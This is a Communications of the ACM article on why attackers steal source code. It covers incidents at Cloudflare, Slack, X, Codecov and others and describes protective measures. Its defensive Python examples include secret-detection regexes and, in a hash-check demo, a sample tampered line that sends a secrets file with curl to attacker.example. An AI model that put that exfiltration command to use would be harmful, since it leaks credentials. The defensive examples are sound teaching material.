Security and Privacy

The Risks of Source Code Breaches

Why attackers want your source code, and what to do about it.

Cybercriminals are stealing source code—computer instructions that developers translate into software. Criminals study and alter software’s underlying source code to better identify its flaws, customize malicious software to exploit it, and target attacks on specific applications and organizations.

“Though there are vulnerabilities across the software ecosystem, there are many security approaches and layers to safeguard source code,” said Victor Acin, head of threat intelligence at Karlskrona, Sweden-based cybersecurity company Outpost24.

In November 2023, attackers, likely hired by a nation-state, used stolen credentials (which identify a user to a system) to breach Cloudflare’s source code. According to a Cloudflare blog, the attackers compromised Cloudflare’s production Atlassian suite, a software product comprising developer tools. The breach reached Bitbucket, an Atlassian tool for managing the software code repositories where developers store and collaborate on source code, and its 11,904 Cloudflare repositories. The attackers viewed 120 repositories and downloaded 76, including repositories covering backup processes, global network configuration and management, and encrypted secrets, which are credentials hidden in scrambled code and stored in a safe place.

Cloudflare said in a post that it checked the repositories after the breach for embedded secrets, which are credentials stored in the source code where cybercriminals can easily find them, and vulnerabilities that an attacker could use in another attack. Cloudflare changed the embedded secrets and managed the vulnerabilities, such as by patching software or changing configurations.
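The kind of check described above, searching repositories for embedded secrets, can be sketched in a few lines of Python. This is a minimal illustration, not Cloudflare’s method: the rule names, the patterns, and the function find_embedded_secrets are assumptions made for this example, and production scanners rely on far larger rule sets.

```python
import re

# Illustrative patterns only (assumptions for this sketch, not a complete rule set).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
    "hardcoded_credential": re.compile(
        r"(?i)\b(?:password|passwd|secret|api_key|token)\b\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}


def find_embedded_secrets(text):
    """Return (line_number, rule_name) pairs for lines that look like secrets."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for rule_name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((line_number, rule_name))
    return findings


if __name__ == "__main__":
    # Hypothetical file contents; the credential is fake.
    sample = 'db_host = "localhost"\npassword = "hunter2-not-real"\n'
    for line_number, rule_name in find_embedded_secrets(sample):
        print(f"line {line_number}: possible {rule_name}")
```

A match is only a lead for a human reviewer. Any credential that turns out to be real should be changed, as Cloudflare did, rather than merely deleted from the code, because it remains in the repository history.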

Code Theft and Breach Concerns

“Attackers want to find existing vulnerabilities and inject new ones or malware [i.e., malicious software] into source code. They commonly do it with open source [software, which anyone can see, share, or change] as it’s an easy target to access. But sophisticated threat actors have done it with internally developed software, too,” says Lou Steinberg, founder of CTM Insights, a Yorktown Heights, NY-based research laboratory and incubator for cybersecurity.

Attackers can test stolen source code and create attack scenarios and malware that target flaws in the code. They can inject malware, such as backdoors providing stealthy, unauthorized remote access, and other vulnerabilities into the code undetected. Such attacks will then affect the doctored code wherever it appears. Since developers reuse code liberally, it can multiply across applications exponentially, creating increasing risk.

Frequency and Severity

Knowing the frequency and severity of source code breaches is challenging, as organizations don’t always report those incidents. “Source code theft and leaks are more common than we like to believe, with many recent examples, including Slack, Twitter (X), and Mercedes-Benz,” says Acin.

A threat actor stole some of Slack’s private code in December 2022, according to a Slack blog. The actor breached Slack’s GitHub code repository using stolen Slack employee access tokens, which are alternatives to passwords for authentication. GitHub lets developers submit software changes simultaneously. The breach did not compromise customer data.

In March 2023, X, formerly Twitter, sent GitHub a copyright infringement takedown letter for the removal of its leaked source code, according to TechRepublic. X suspected a former employee purposely disclosed the source code to the public via GitHub. The code included proprietary source code for Twitter’s platform and internal tools, according to The Verge.

In January 2024, RedHunt Labs, an attack surface monitoring company in the U.K., reported discovering a Mercedes-Benz employee’s GitHub token in a public repository. The token gave the public unmonitored, unrestricted access to Mercedes-Benz’s internal GitHub Enterprise Server with all the source code hosted there, according to a RedHunt Labs blog.

The prevalence and gravity of these attacks are likely worse than the evidence suggests. Existing regulations from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Securities and Exchange Commission (SEC) mandating cyber incident reports could eventually enable risk metrics regarding the likelihood and severity of compromised code.

Taking It Personally

Attackers use stolen source code to construct attacks on specific organizations. “Personalized payloads are the king of the game, especially in high-profile cases where a nation-state-sponsored group such as Lazarus performs the attack,” said Acin. Lazarus is a North Korea-sponsored threat actor group that uses personalized payloads.

A personalized payload is an exploit targeting a particular application with a concrete purpose, according to Acin. These payloads are typically zero-day exploits sold in the underground market, Acin said. (‘Zero day’ means the vendor has zero days to fix the flaw before attackers exploit it.)

Fathomless Risk

The risk of stolen and altered source code is extensive. The attack surface, which includes all possible attack points, is vast and deep, with layers of software and systems supporting code development, dissemination, and use. Each layer has its vulnerabilities.

“It’s very difficult to protect modern development pipelines [systems that move software through development stages efficiently] and the massive supply chain of tools, libraries, and frameworks [pre-written code], and services that go into software development,” said Jeff Williams, co-founder and CTO at Contrast Security, a cybersecurity company.

Repeated examples of supply chain attacks, such as the one against SolarWinds, and vulnerabilities in open-source libraries, such as in Log4j, show the challenges of addressing compromised source code.

“Compromised source code can lead to unresolved security issues. I experienced a project where a minor vulnerability in a shared utility library went unnoticed for years. The delay in addressing the flaw increased the risk exposure and multiplied the remediation costs,” said Dmitrii Ivashchenko, Unity game developer at MY.GAMES.

Source code reuse spreads vulnerable code that cybercriminals may already have stolen. According to Ivashchenko, ubiquitous code reuse exacerbates the risk and amplifies the effects of source code breaches. It is not uncommon for developers to reuse code hundreds of thousands, if not millions, of times across various projects and applications, Ivashchenko said.

Counting the Costs

It’s hard to isolate the financial costs of source code compromise from those of breaches in general. Data breaches cost organizations a global average of $4.45 million each, according to the 2023 IBM Cost of a Data Breach Report.

“Organizations may face reputational damage due to compromised software, eroding customer trust and confidence,” said Ivashchenko. Source code breaches compromising user data or violating privacy also have legal and regulatory implications, Ivashchenko said.

Dissecting Code Breaches

Supply chain attacks use one vulnerability to attack many organizations. “If you inject code, you know exactly how to exploit it, and you leverage a trusted company as the distribution channel,” said Steinberg.

In 2021, threat actors altered the Bash Uploader script of Codecov, a software testing vendor, according to a Codecov security update. The attackers put their IP address (network address) in the script so that it uploaded customer code to their server rather than to Codecov’s. According to Dark Reading, attackers had access to Codecov customer development data for two months.
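One common safeguard against a silently altered script is to compare its SHA-256 digest with a known-good value before running it. The Python sketch below illustrates the idea. The function names and the sample script contents are hypothetical, and the sketch assumes the pinned digest was obtained through a separate trusted channel, since a digest served alongside a tampered script offers no protection.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_script(script_bytes: bytes, expected_sha256: str) -> bool:
    """Return True only if the script matches the pinned digest."""
    actual = sha256_hex(script_bytes)
    # Normalize whitespace and case, then compare in constant time.
    return hmac.compare_digest(actual, expected_sha256.strip().lower())


if __name__ == "__main__":
    # Hypothetical script contents for illustration.
    trusted = b"#!/bin/bash\necho uploading coverage report\n"
    pinned = sha256_hex(trusted)  # in practice, taken from a trusted source
    tampered = trusted + b"curl -d @secrets http://attacker.example\n"

    print(verify_script(trusted, pinned))
    print(verify_script(tampered, pinned))
```

A build pipeline would refuse to execute the script whenever verify_script returns False.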

Social engineering is useful in attacks breaching source code. In 2023, attackers breached the source code for Riot Games’ League of Legends and Teamfight Tactics games, according to a Riot Games thread on X, formerly Twitter. Using a social engineering attack, the criminals took code for the games, a legacy anti-cheat platform designed to prevent cheating, and some experimental game modes and features. According to the thread, the attack disrupted the Riot Games software build environment and could cause future issues. Developers write, test, and deploy applications through a build environment.

Protecting Source Code

The best approaches to source code security include standard defenses and measures specific to code and code repositories. “Source code is just files, so all the standard file protection defenses apply: encryption, authentication, access control, change management, and exfiltration detection,” said Williams.

Encryption: It scrambles data so that unauthorized parties cannot read it.
Authentication: It identifies a user before they can access a system.
Access Control: It uses roles to control access rights and privileges.
Change Management: It plans, documents, and controls change.
Exfiltration Detection: It detects and prevents data from leaving the organization.

Organizations can monitor and audit code repositories, enabling prompt detection of and response to suspicious activities, said Ivashchenko. Organizations must also consider measures such as code obfuscation, which makes code obscure and unintelligible to cybercriminals. Likewise, white-box cryptography, which combines encryption with code obfuscation, can make exploiting code challenging for attackers even if they exfiltrate it for further examination, he said.
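Repository monitoring can start with something as simple as flagging accounts that clone or download an unusual number of repositories in a short period. The Python sketch below shows one way to do that with a sliding time window. The event format, the function name flag_bulk_cloners, and the thresholds are assumptions for illustration and do not correspond to any particular hosting platform’s audit log.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def flag_bulk_cloners(events, max_repos=20, window=timedelta(hours=1)):
    """Flag users who touch too many distinct repositories too quickly.

    events: iterable of (timestamp, user, repo) clone/download records.
    Returns the set of users who accessed more than max_repos distinct
    repositories within any time span of length `window`.
    """
    by_user = defaultdict(list)
    for timestamp, user, repo in events:
        by_user[user].append((timestamp, repo))

    flagged = set()
    for user, records in by_user.items():
        records.sort()
        start = 0
        counts = defaultdict(int)  # repo -> accesses inside the window
        for end_time, repo in records:
            counts[repo] += 1
            # Drop records that have fallen out of the window.
            while end_time - records[start][0] > window:
                old_repo = records[start][1]
                counts[old_repo] -= 1
                if counts[old_repo] == 0:
                    del counts[old_repo]
                start += 1
            if len(counts) > max_repos:
                flagged.add(user)
                break
    return flagged


if __name__ == "__main__":
    # Hypothetical audit records: one account pulls 30 repos in 30 minutes.
    t0 = datetime(2024, 1, 1, 12, 0)
    events = [(t0 + timedelta(minutes=i), "mallory", f"repo-{i}") for i in range(30)]
    events += [(t0 + timedelta(hours=i), "alice", f"repo-{i}") for i in range(30)]
    print(flag_bulk_cloners(events))
```

Thresholds like these need tuning against normal developer behavior, and an alert is a prompt for investigation, not proof of theft.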

Ivashchenko said that despite the uncertainties surrounding source code breaches and organizations’ reluctance to disclose such incidents, cybersecurity has sophisticated measures to safeguard source code against the ever-evolving landscape of cyber threats.

David Geer is a journalist who focuses on issues related to cybersecurity. He writes from Cleveland, OH, USA.

Communications of the ACM (CACM) is now a fully Open Access publication.
